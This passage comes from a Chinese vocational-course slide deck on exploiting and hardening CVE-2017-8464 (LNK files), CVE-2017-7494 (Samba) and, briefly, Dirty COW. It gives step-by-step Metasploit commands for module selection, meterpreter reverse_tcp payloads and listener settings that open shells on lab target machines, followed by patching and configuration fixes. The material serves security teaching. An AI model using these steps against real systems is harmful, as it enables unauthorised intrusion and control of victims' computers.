件遠(yuǎn)程代碼執(zhí)行【項(xiàng)目分析】
CVE-2017-8464漏洞是存在于Windows的一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞原理在經(jīng)特殊設(shè)計(jì)快捷方式圖標(biāo)顯示時(shí)允許發(fā)生遠(yuǎn)程代碼執(zhí)行。Windows系統(tǒng)使用二進(jìn)制解析.LNK文件,當(dāng)惡意二進(jìn)制代碼被系統(tǒng)識(shí)別執(zhí)行時(shí)即可實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行,成功利用此漏洞的攻擊者會(huì)獲得與本地用戶(hù)相同的用戶(hù)權(quán)限。本項(xiàng)目運(yùn)用Metasploit對(duì)目標(biāo)主機(jī)所存在的漏洞進(jìn)行利用,選用multi/handler監(jiān)聽(tīng)模塊,利用后可獲取shell。3.2.2利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行3.2.2利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行【相關(guān)知識(shí)】北京時(shí)間2017年6月13日凌晨,微軟官方發(fā)布6月安全補(bǔ)丁程序,“震網(wǎng)三代”LNK文件遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-8464)就在其中,該漏洞是一個(gè)微軟Windows系統(tǒng)處理LNK文件過(guò)程中發(fā)生的遠(yuǎn)程代碼執(zhí)行漏洞,當(dāng)存在漏洞的系統(tǒng)被插上有.LNK文件病毒木馬的U盤(pán)或運(yùn)行了感染有病毒木馬的文件時(shí),不需要任何額外操作,漏洞攻擊程序便可以借此完全控制用戶(hù)的電腦系統(tǒng)。該漏洞也可能由用戶(hù)訪(fǎng)問(wèn)網(wǎng)絡(luò)共享、從互聯(lián)網(wǎng)下載、拷貝文件等操作從而觸發(fā)和利用攻擊。也就是說(shuō),漏洞可以在系統(tǒng)開(kāi)啟U盤(pán)自動(dòng)播放功能,通過(guò)網(wǎng)絡(luò)共享訪(fǎng)問(wèn)文件或直接訪(fǎng)問(wèn)等情況下觸發(fā)。3.2.2利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行【項(xiàng)目實(shí)例】
小王在對(duì)辦公室的電腦進(jìn)行安全檢查時(shí),發(fā)現(xiàn)有一臺(tái)Window7系統(tǒng)的辦公電腦可能存在CVE-2017-8464漏洞,這個(gè)漏洞可能會(huì)被攻擊者利用,于是他決定對(duì)系統(tǒng)進(jìn)行安全測(cè)試并加固。3.2.2利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行【項(xiàng)目實(shí)施】步驟一
準(zhǔn)備測(cè)試環(huán)境本任務(wù)所使用的計(jì)算機(jī)見(jiàn)下表:編號(hào)操作系統(tǒng)IP地址用途1kali2020攻擊機(jī)2Win2003R2-15靶機(jī)步驟二cve-2017-8464漏洞利用設(shè)置1.在KaliLinux終端界面中輸入“msfconsole”命令,打開(kāi)Metasploit框架,如圖3-2-10所示圖3-2-10打開(kāi)Metasploit框架2.使用search搜索可利用的漏洞,輸入“searchcve-2017-8464”命令搜索cve-2017-8464漏洞模塊,發(fā)現(xiàn)可利用漏洞模塊“exploit/windows/fileformat/cve_2017_8464_lnk_rce”,如圖3-2-11所示。3.使用漏洞模塊“use
exploit/windows/fileformat/cve_2017_8464_lnk_rce”進(jìn)行漏洞利用,并用showoptions命令查詢(xún)?cè)O(shè)置參數(shù),如圖3-2-12所示。圖3-2-11搜索cve-2017-8464漏洞模塊圖3-2-12漏洞模塊配置參數(shù)4.設(shè)置攻擊載荷payload、攻擊目標(biāo)、監(jiān)聽(tīng)主機(jī)參數(shù),這里采用TCP的meterpreter反彈載荷,如圖3-2-13所示。設(shè)置攻擊載荷:setpayloadwindows/x64/meterpreter/reverse_tcp設(shè)置監(jiān)聽(tīng)主機(jī)(kali):setlhost設(shè)置監(jiān)聽(tīng)端口:setlport5555,用showoptions查配置參數(shù),如圖3-2-14所示。圖3-2-13設(shè)置攻擊載荷圖3-2-14攻擊載荷參數(shù)5.輸入run或exploit命令開(kāi)始執(zhí)行。漏洞模塊在/root/.msf4/local目錄下生成一個(gè)FlashPlayerCPLApp.cpl的dll文件和大量的LNK文件,每個(gè)LNK文件對(duì)應(yīng)一個(gè)盤(pán)符從D盤(pán)到Z盤(pán),將FlashPlayerCPLApp.cpl復(fù)制到靶機(jī)上,當(dāng)觸發(fā)執(zhí)行時(shí)靶機(jī)便與攻擊機(jī)建立遠(yuǎn)程連接,如圖3-2-15和3-2-16所示。圖3-2-15執(zhí)行攻擊圖3-2-16/root/.msf4/local目錄下文件步驟二multi/handler模塊設(shè)置1.設(shè)置攻擊載荷參數(shù)設(shè)置攻擊載荷setpayloadwindows/x64/meterpreter/reverse_tcp,設(shè)置監(jiān)聽(tīng)主機(jī)(kali):setlhost設(shè)置監(jiān)聽(tīng)端口:setlport5555用showoptions命令檢查配置參數(shù)如圖3-2-17和圖3-2-18所示。圖3-2-17設(shè)置multi/handler模塊攻擊載荷3-2-18multi/handler模塊配置參數(shù)2.執(zhí)行監(jiān)聽(tīng),當(dāng)靶機(jī)沒(méi)有觸發(fā)FlashPlayerCPLApp.cpl時(shí),處于監(jiān)聽(tīng)狀態(tài),如圖3-2-19所示。圖3-2-19開(kāi)始監(jiān)聽(tīng)3.在靶機(jī)上運(yùn)行FlashPlayerCPLApp.cpl文件,隨后便會(huì)反彈shell,結(jié)果如圖3-2-20所示圖3-2-20建立連接4.輸入shell命令獲取靶機(jī)shell,輸入ipconfig可查看靶機(jī)的IP地址,如圖3-2-21和圖3-2-22所示,至此漏洞的利用測(cè)試結(jié)束。圖3-2-21獲取靶機(jī)shell圖3-2-22查看靶機(jī)IP步驟三漏洞加固1、自動(dòng)更新安裝官方補(bǔ)??;2、360漏洞補(bǔ)丁修復(fù)工具;3、關(guān)閉U盤(pán)自動(dòng)播功能。根據(jù)項(xiàng)目實(shí)施的步驟,完成CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行,要求用multi/handler模塊把FlashPlayerCPLApp.cpl文件復(fù)制到靶機(jī),獲取靶機(jī)shell,最后關(guān)閉U盤(pán)自動(dòng)播功能和安裝補(bǔ)丁的方法加固漏洞。3.2.2利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行【項(xiàng)目訓(xùn)練】3.2.2利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行【項(xiàng)目評(píng)價(jià)】項(xiàng)目名稱(chēng):利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行班級(jí):學(xué)號(hào):姓名:日期:評(píng)價(jià)項(xiàng)目評(píng)價(jià)標(biāo)準(zhǔn)分值自評(píng)得分組內(nèi)評(píng)分專(zhuān)業(yè)知識(shí)cve-2017-8464漏洞10
小組配合FlashPlayerCPLApp.cpl復(fù)制到靶機(jī)并運(yùn)行20
小組評(píng)價(jià)組員溝通、合作、完成情況10
工作態(tài)度態(tài)度端正,無(wú)無(wú)故缺勤、遲到、早退10
工作質(zhì)量按計(jì)劃完成工作任務(wù)30
協(xié)調(diào)能力與小組成員能合作,協(xié)調(diào)工作10
職業(yè)素質(zhì)實(shí)訓(xùn)過(guò)程認(rèn)真細(xì)致5
創(chuàng)新意識(shí)有獨(dú)立見(jiàn)解,提出獨(dú)特解決問(wèn)題方法5
合計(jì)100
項(xiàng)目名稱(chēng):利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行評(píng)價(jià)項(xiàng)目分值等級(jí)評(píng)價(jià)對(duì)象(組別)123456成果展示10優(yōu)(9-10)良(8-9)中(6-7)差(1-5)
3.2.2利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行【任務(wù)拓展】嘗試用U盤(pán)自動(dòng)播放的方式執(zhí)行l(wèi)nk文件,使之與攻擊機(jī)建立連接。謝
謝!第3章
常見(jiàn)漏洞利用與加固03本章內(nèi)容0102033.1Windows操作系統(tǒng)漏洞3.2Windows服務(wù)漏洞3.3Linunx服務(wù)漏洞033.3Linunx服務(wù)漏洞3.3.1利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行3.3.2利用CVE-CVE-2016-5195漏洞實(shí)現(xiàn)Linux系統(tǒng)本地提權(quán)3.3.1利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行學(xué)習(xí)目標(biāo)項(xiàng)目分析相關(guān)知識(shí)項(xiàng)目實(shí)例項(xiàng)目實(shí)施項(xiàng)目訓(xùn)練項(xiàng)目評(píng)價(jià)學(xué)習(xí)路徑【學(xué)習(xí)目標(biāo)】1、了解LINUX服務(wù)漏洞。2、利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行。3.3.1利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行【項(xiàng)目分析】
Linux是一個(gè)基于多用戶(hù)、多任務(wù)、支持多線(xiàn)程和多CPU的操作系統(tǒng)。Linux服務(wù)器在網(wǎng)絡(luò)和計(jì)算機(jī)系統(tǒng)當(dāng)中有廣泛的應(yīng)用,可以提供數(shù)據(jù)庫(kù)管理和網(wǎng)絡(luò)服務(wù)等內(nèi)容,是一種性能高且開(kāi)源的服務(wù)器,在計(jì)算機(jī)應(yīng)該系統(tǒng)中,有很多采用Linux系統(tǒng),其使用的范圍非常廣泛,用戶(hù)體驗(yàn)反應(yīng)較好。但LINUX服務(wù)也不可避免的存在一些漏洞,攻擊者通過(guò)利用漏洞給用戶(hù)帶來(lái)極大的危害。漏洞編號(hào)CVE-2017-7494是一個(gè)嚴(yán)重的遠(yuǎn)程代碼執(zhí)行漏洞,攻擊者可以利用該漏洞在目標(biāo)服務(wù)器上執(zhí)行任意代碼。漏洞利用條件是服務(wù)端共享目錄有訪(fǎng)問(wèn)權(quán)限以及需要對(duì)服務(wù)器上寫(xiě)一個(gè)惡意文件并知道該文件的物理路徑。本項(xiàng)目將通過(guò)CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行,從而來(lái)介紹Linux服務(wù)漏洞。3.3.1利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行3.3.1利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行【相關(guān)知識(shí)】Samba服務(wù)是在Linux和UNIX系統(tǒng)上實(shí)現(xiàn)SMB協(xié)議的一個(gè)免費(fèi)軟件,由服務(wù)器及客戶(hù)端程序構(gòu)成。SMB是在局域網(wǎng)上共享文件和打印機(jī)的一種通信協(xié)議,它為局域網(wǎng)內(nèi)的不同計(jì)算機(jī)之間提供文件及打印機(jī)等資源的共享服務(wù)。SMB協(xié)議是客戶(hù)機(jī)/服務(wù)器型協(xié)議,客戶(hù)機(jī)通過(guò)該協(xié)議可以訪(fǎng)問(wèn)服務(wù)器上的共享文件系統(tǒng)、打印機(jī)及其他資源。通過(guò)設(shè)置“NetBIOSoverTCP/IP”使得Samba不但能與局域網(wǎng)絡(luò)主機(jī)分享資源,還能與因特網(wǎng)上的遠(yuǎn)程主機(jī)分享資源。CVE-2017-7494安全漏洞出現(xiàn)在smbd守護(hù)進(jìn)程,能夠被惡意的samba客戶(hù)端利用,允許攻擊者遠(yuǎn)程執(zhí)行惡意代碼,攻擊者通過(guò)發(fā)送一個(gè)惡意構(gòu)造的代碼到samba服務(wù)器,不需經(jīng)過(guò)認(rèn)證,便能夠?qū)惯h(yuǎn)程服務(wù)器以root權(quán)限執(zhí)行任意命令。3.3.1利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行【項(xiàng)目實(shí)例】網(wǎng)絡(luò)管理員小王最近在網(wǎng)絡(luò)上看到一則有關(guān)LINUX系統(tǒng)Samba服務(wù)的漏洞消息,出于專(zhuān)業(yè)的敏銳性,他馬上對(duì)公司的LINUX服務(wù)器進(jìn)行檢查測(cè)試,結(jié)果發(fā)現(xiàn)服務(wù)器正好存在網(wǎng)絡(luò)上所說(shuō)的Samba服務(wù)漏洞,漏洞代碼CVE-2017-7494,于是他立刻對(duì)服務(wù)器進(jìn)行了加固,重新安裝和升級(jí)了更高版本的Samba服務(wù),確保服務(wù)器的安全運(yùn)行。3.3.1利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行【項(xiàng)目實(shí)施】步驟一
準(zhǔn)備測(cè)試環(huán)境本任務(wù)所使用的計(jì)算機(jī)見(jiàn)下表:編號(hào)操作系統(tǒng)IP地址用途1kali2020攻擊機(jī)2CenterOS6-10靶機(jī)靶機(jī)安裝smaba服務(wù)器,開(kāi)啟139、445端口,確保網(wǎng)絡(luò)互連互通。步驟二,CVE-2017-7494漏洞利用1.在KaliLinux終端用nmap0掃描目標(biāo)靶機(jī)是否開(kāi)啟139、445端口,445端口作為Samba服務(wù),139作為獲取Samba服務(wù),如圖3-3-1所示。圖3-3-1掃描目標(biāo)靶機(jī)端口2.在KaliLinux終端界面中輸入“msfconsole”命令,打開(kāi)Metasploit框架,如圖3-3-2所示圖3-3-2打開(kāi)Metasploit框架3.使用search搜索可利用的漏洞,輸入“searchis_known_pipename”命令搜索is_known_pipename漏洞模塊,顯示exploit/linux/samba/is_known_pipename可利用模塊,如圖3-3-3所示。。圖3-3-3搜索漏洞利用模塊4.使用“useexploit/linux/samba/is_known_pipename”漏洞模塊,用“showoptions”命令查看配置參數(shù),如圖3-3-4所示圖3-3-4使用搜索漏洞模塊5.設(shè)置目標(biāo)靶機(jī)IP0,端口445,執(zhí)行攻擊后,看到成功獲得sesions會(huì)話(huà)為1,然后成功進(jìn)入到metermter的shell界面獲取了用戶(hù)最高權(quán)限,可遠(yuǎn)程執(zhí)行任何代碼,如圖3-3-5所示。圖3-3-5執(zhí)行攻擊獲取shell6.遠(yuǎn)程執(zhí)行命令,在kali和目標(biāo)打靶機(jī)都輸入who命令,然后進(jìn)行對(duì)比是否一樣,結(jié)果效果是一樣的,說(shuō)明遠(yuǎn)程攻擊機(jī)已獲取了靶機(jī)的最高用戶(hù)root權(quán)限,如圖3-3-6和圖3-3-7所示。圖3-3-6在攻擊機(jī)上運(yùn)行的結(jié)果圖3-3-7在靶機(jī)運(yùn)行的結(jié)果步驟三,漏洞加固措施1、使用samba最新版本;2、在smb.conf的[global]階段下增加ntpipesupport=no,重啟samba服務(wù)。vim/etc/samba/smb.conf【項(xiàng)目訓(xùn)練】1、根據(jù)項(xiàng)目實(shí)施的步驟,完成CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行。2、填寫(xiě)以下項(xiàng)目訓(xùn)練節(jié)點(diǎn)的名稱(chēng)或參數(shù)。項(xiàng)目名稱(chēng)項(xiàng)目節(jié)點(diǎn)節(jié)點(diǎn)參數(shù)準(zhǔn)備測(cè)試環(huán)境1、設(shè)置滲透機(jī)IP
2、設(shè)置靶機(jī)IP
3、檢測(cè)靶安裝Samba服務(wù)
4、開(kāi)啟139、445端口
5、網(wǎng)絡(luò)互連互通
利用漏洞實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行1、掃描目標(biāo)靶機(jī)端口
2、搜索漏洞利用模塊
3、設(shè)置目標(biāo)靶機(jī)IP和端口
4、執(zhí)行攻擊獲取shell
5、遠(yuǎn)程執(zhí)行代碼
漏洞加固1、使用samba最新版本;
2、修改smb.conf文件3.3.1利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行【項(xiàng)目評(píng)價(jià)】項(xiàng)目名稱(chēng):利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行班級(jí):學(xué)號(hào):姓名:日期:評(píng)價(jià)項(xiàng)目評(píng)價(jià)標(biāo)準(zhǔn)分值自評(píng)得分組內(nèi)評(píng)分專(zhuān)業(yè)知識(shí)Samba服務(wù)CVE-2017-7494漏洞10
小組配合執(zhí)行攻擊獲取shell并遠(yuǎn)程執(zhí)行代碼20
小組評(píng)價(jià)組員溝通、合作、完成情況10
工作態(tài)度態(tài)度端正,無(wú)無(wú)故缺勤、遲到、早退10
工作質(zhì)量按計(jì)劃完成工作任務(wù)30
協(xié)調(diào)能力與小組成員能合作,協(xié)調(diào)工作10
職業(yè)素質(zhì)實(shí)訓(xùn)過(guò)程認(rèn)真細(xì)致5
創(chuàng)新意識(shí)有獨(dú)立見(jiàn)解,提出獨(dú)特解決問(wèn)題方法5
合計(jì)100
項(xiàng)目名稱(chēng):利用CVE-2017-8464漏洞實(shí)現(xiàn)LINK文件遠(yuǎn)程代碼執(zhí)行評(píng)價(jià)項(xiàng)目分值等級(jí)評(píng)價(jià)對(duì)象(組別)123456成果展示10優(yōu)(9-10)良(8-9)中(6-7)差(1-5)
3.3.1利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行【任務(wù)拓展】修改smb.conf配置文件,使之修復(fù)漏洞。謝
謝!第3章
常見(jiàn)漏洞利用與加固03本章內(nèi)容0102033.1Windows操作系統(tǒng)漏洞3.2Windows服務(wù)漏洞3.3Linunx服務(wù)漏洞033.3Linunx服務(wù)漏洞3.3.1利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行3.3.2利用CVE-CVE-2016-5195漏洞實(shí)現(xiàn)Linux系統(tǒng)本地提權(quán)3.3.2利用CVE-CVE-2016-5195漏洞實(shí)現(xiàn)Linux系統(tǒng)本地提權(quán)學(xué)習(xí)目標(biāo)項(xiàng)目分析相關(guān)知識(shí)項(xiàng)目實(shí)例項(xiàng)目實(shí)施項(xiàng)目訓(xùn)練項(xiàng)目評(píng)價(jià)學(xué)習(xí)路徑【學(xué)習(xí)目標(biāo)】1、學(xué)會(huì)利用CVE-2016-5195漏洞實(shí)現(xiàn)Linux系統(tǒng)本地提權(quán)。3.3.2利用CVE-2016-5195漏洞實(shí)現(xiàn)Linux系統(tǒng)本地提權(quán)【項(xiàng)目分析】
目前主流系統(tǒng)都是多用戶(hù)操作系統(tǒng),同時(shí)可以登錄多個(gè)用戶(hù),實(shí)現(xiàn)權(quán)限的隔離,針對(duì)不同的應(yīng)用,不同的賬戶(hù)具有不同的權(quán)限;如管理賬戶(hù)與普用戶(hù)賬戶(hù)之間的不同。本地提權(quán)一般用于已經(jīng)獲取到了本地低權(quán)限的賬號(hào),希望獲取更高的權(quán)限,實(shí)現(xiàn)對(duì)目標(biāo)的進(jìn)一步控制;權(quán)限控制是操作系統(tǒng)安全的基本,本地提權(quán)在攻擊者入侵過(guò)程中起到重要的作用。本項(xiàng)目將通過(guò)CVE-2016-5195漏洞實(shí)現(xiàn)Linux系統(tǒng)本地提權(quán)的滲透測(cè)試,從而介紹Linux服務(wù)漏洞。洞。3.3.2利用CVE-2016-5195漏洞實(shí)現(xiàn)Linux系統(tǒng)本地提權(quán)3.3.2利用CVE-2016-5195漏洞實(shí)現(xiàn)Linux系統(tǒng)本地提權(quán)【相關(guān)知識(shí)】Linux系統(tǒng)漏洞(CVE-2016-5195),也叫臟牛(DirtyCOW)漏洞,該漏洞是Linux的一個(gè)本地提權(quán)漏洞,其漏洞危害是低權(quán)限用戶(hù)利用該漏洞技術(shù)可以在全版本Linux系統(tǒng)上實(shí)現(xiàn)本地提權(quán),甚至可以達(dá)到root的權(quán)限,從2.6.22起的所有Linux內(nèi)核版本都受影響,直到2016年10月18日才修復(fù)。該漏洞的原因是get_user_page內(nèi)核函數(shù)在處理Copy-on-Write(以下使用COW表示)的過(guò)程中,可能產(chǎn)出競(jìng)態(tài)條件造成COW過(guò)程被破壞,導(dǎo)致出現(xiàn)寫(xiě)數(shù)據(jù)到進(jìn)程地址空間內(nèi)只讀內(nèi)存區(qū)域的機(jī)會(huì)。當(dāng)向帶有MAP_PRIVATE標(biāo)記的只讀文件映射區(qū)域?qū)憯?shù)據(jù)時(shí),會(huì)產(chǎn)生一個(gè)映射文件的復(fù)制(COW),對(duì)此區(qū)域的任何修改都不會(huì)寫(xiě)回原來(lái)的文件,如果上述的競(jìng)態(tài)條件發(fā)生,就能成功的寫(xiě)回原來(lái)的文件,比如修改su或者passwd程序就可以達(dá)到獲取root權(quán)限的目的。。3.3.2利用CVE-2016-5195漏洞實(shí)現(xiàn)Linux系統(tǒng)本地提權(quán)【項(xiàng)目實(shí)例】網(wǎng)絡(luò)管理員小王在對(duì)公司的LINUX服務(wù)器進(jìn)行安全檢查測(cè)試時(shí),發(fā)現(xiàn)服務(wù)器的一個(gè)普通用戶(hù)可以通過(guò)本地提權(quán)的方式達(dá)到root管理員的權(quán)限,這一發(fā)現(xiàn)使他大吃一驚,如果所有的普通用戶(hù)都能提權(quán)為管理員用戶(hù)的權(quán)限,那么對(duì)服務(wù)器的安全是極危險(xiǎn)的,黑客更可以通過(guò)無(wú)限的權(quán)限控制服務(wù)器,因此,對(duì)服務(wù)器進(jìn)行了測(cè)試。3.3.1利用CVE-2017-7494漏洞實(shí)現(xiàn)Samba遠(yuǎn)程代碼執(zhí)行【項(xiàng)目實(shí)施】步驟一
準(zhǔn)備測(cè)試環(huán)境本任務(wù)所使用的計(jì)算機(jī)見(jiàn)下表
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶(hù)所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶(hù)上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶(hù)因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年事業(yè)單位筆試-北京-北京預(yù)防醫(yī)學(xué)(醫(yī)療招聘)歷年參考題庫(kù)典型考點(diǎn)含答案解析
- 2025年事業(yè)單位筆試-北京-北京中醫(yī)骨傷科學(xué)(醫(yī)療招聘)歷年參考題庫(kù)典型考點(diǎn)含答案解析
- 2025年事業(yè)單位筆試-內(nèi)蒙古-內(nèi)蒙古皮膚病與性病學(xué)(醫(yī)療招聘)歷年參考題庫(kù)典型考點(diǎn)含答案解析
- 2025年事業(yè)單位工勤技能-黑龍江-黑龍江保健按摩師三級(jí)(高級(jí)工)歷年參考題庫(kù)含答案解析
- 機(jī)械基礎(chǔ)知識(shí)培訓(xùn)教材課件
- 新解讀《GB-T 14218-2018電子調(diào)光設(shè)備性能參數(shù)與測(cè)試方法》
- 團(tuán)隊(duì)總監(jiān)面試題目及答案
- 鐵道建筑面試題目及答案
- 體能中心面試題目及答案
- 南京高二統(tǒng)考數(shù)學(xué)試卷
- 八年級(jí)下冊(cè)英語(yǔ)2025電子版人教版單詞表
- 2024-2025年度上海市社會(huì)工作者之中級(jí)社會(huì)綜合能力高分通關(guān)題庫(kù)
- 2025年中級(jí)消防設(shè)施操作員(監(jiān)控類(lèi))資格理論必背考試題庫(kù)(附答案)
- 2023秸稈類(lèi)生物質(zhì)能源原料儲(chǔ)存規(guī)范第1部分:存放
- 餐廳收貨流程
- 消毒供應(yīng)室課件
- 政府招商投資合作框架協(xié)議書(shū)模板6篇
- 《睡眠呼吸暫停低通氣綜合征與高血壓》課件
- 2025年房東租房合同模板電子版
- 2025年企業(yè)勞動(dòng)者雇傭合同樣本
- 【MOOC】《網(wǎng)絡(luò)技術(shù)與應(yīng)用》(南京郵電大學(xué))章節(jié)中國(guó)大學(xué)慕課答案
評(píng)論
0/150
提交評(píng)論